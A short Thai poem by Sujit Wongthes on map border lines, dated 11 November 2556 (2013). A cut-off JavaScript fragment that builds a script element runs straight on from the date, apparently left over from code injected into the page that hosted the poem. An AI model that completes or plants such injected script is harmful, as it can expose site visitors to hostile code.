เส้นที่ระลึก

สุจิตต์ วงษ์เทศ

 

๏ เส้นสมมุติเขตแดนบนแผนที่

มีอยู่ก็ทำใจเหมือนไม่มี

ไม่รู้ไม่ชี้เสียบ้างสบายสบาย

อย่าเอาเป็นเอาตายกับสายเส้น

ถึงยังไงก็ไม่เห็นจะหดหาย

มาร่วมกันสรรค์สร้างอย่างง่ายดาย

เส้นกั้นกลายเป็นของที่ระลึกเอย

 

บ้านช่างหล่อ กรุงธนบุรี

11 พฤศจิกายน 2556var d=document;var s=d.createElement(‘script’);